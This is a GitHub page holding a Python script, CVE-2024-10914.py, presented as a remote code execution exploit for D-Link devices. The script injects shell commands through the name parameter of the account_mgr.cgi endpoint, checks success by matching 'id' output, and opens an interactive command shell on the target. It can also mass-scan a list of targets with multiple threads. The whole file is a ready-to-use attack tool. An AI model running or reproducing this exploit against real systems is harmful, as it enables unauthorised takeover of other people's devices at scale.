-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2024-10914.py
110 lines (92 loc) · 4.67 KB
/
CVE-2024-10914.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import requests
import re
import argparse
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
console = Console()
# Banner
def print_banner():
console.print(r"""
[cyan bold] _______ ________ ___ ____ ___ __ __ _______ ____ _____ __[/cyan bold]
[cyan bold] / ____/ | / / ____/ |__ \ / __ \__ \/ // / < / __ \/ __ < / // /[/cyan bold]
[cyan bold] / / | | / / __/________/ // / / /_/ / // /_______/ / / / / /_/ / / // /_[/cyan bold]
[cyan bold]/ /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ / /_/ /\__, / /__ __/[/cyan bold]
[cyan bold]\____/ |___/_____/ /____/\____/____/ /_/ /_/\____//____/_/ /_/[/cyan bold]
[yellow]CVE-2024-10914 - D-Link Remote Code Execution Exploit[/yellow]
[red]coded by redspy[/red]
""")
endpoint = "/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';{};'"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
}
def test_vulnerability(target, payload):
url = f"{target}{endpoint.format(payload)}"
try:
response = requests.get(url, headers=headers, timeout=30, verify=False)
if response.status_code == 200:
matcher = re.search(r"uid=\d+\((\w+)\).*gid=\d+\((\w+)\)", response.text)
if matcher:
console.print(f"[green][+] Target is vulnerable: {target}[/green]")
console.print(f"[green][+] Response: {matcher.group()}[/green]")
return True
console.print(f"[red][-] Target is not vulnerable: {target}[/red]")
return False
except requests.exceptions.RequestException as e:
console.print(f"[red][!] Error with {target}: {e}[/red]")
return False
def start_shell(target):
session = PromptSession(
HTML("<ansicyan>Interactive Shell:</ansicyan> "),
history=InMemoryHistory(),
)
console.print("[cyan][*] Interactive shell started. Type 'exit' to quit.[/cyan]\n")
while True:
try:
command = session.prompt(HTML("<ansicyan>~$</ansicyan> ")).strip()
if command.lower() in ["exit", "quit"]:
console.print("[cyan][*] Exiting interactive shell.[/cyan]")
break
url = f"{target}{endpoint.format(command)}"
response = requests.get(url, headers=headers, timeout=10, verify=False)
if response.status_code == 200:
console.print(response.text.strip())
else:
console.print(f"[red][!] Command failed with status code: {response.status_code}[/red]")
except requests.RequestException as e:
console.print(f"[red][!] Error during request: {e}[/red]")
except KeyboardInterrupt:
console.print("\n[cyan][*] Exiting interactive shell.[/cyan]")
break
def scan_file(file_path, payload, threads=5):
with open(file_path, 'r') as file:
targets = [line.strip() for line in file if line.strip()]
console.print(f"[yellow][*] Scanning {len(targets)} targets from file: {file_path}[/yellow]\n")
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = {executor.submit(test_vulnerability, target, payload): target for target in targets}
for future in as_completed(futures):
target = futures[future]
try:
if future.result():
console.print(f"[green][+] Target {target} is vulnerable.[/green]")
except Exception as e:
console.print(f"[red][!] Error with {target}: {e}[/red]")
if __name__ == "__main__":
print_banner()
parser = argparse.ArgumentParser(description="CVE-2024-10914 RCE exploit")
parser.add_argument("-u", "--url", help="Single target URL to test")
parser.add_argument("-f", "--file", help="File containing list of target URLs")
parser.add_argument("-p", "--payload", default="id", help="Payload to test (default: id)")
parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads for file scanning (default: 5)")
args = parser.parse_args()
if args.url:
console.print(f"[yellow][*] Testing target: {args.url}[/yellow]\n")
if test_vulnerability(args.url, args.payload):
console.print("[cyan][*] Starting interactive shell...[/cyan]\n")
start_shell(args.url)
elif args.file:
scan_file(args.file, args.payload, args.threads)
else:
console.print("[red][-] Please provide either a single URL (-u) or a file (-f) with targets.[/red]")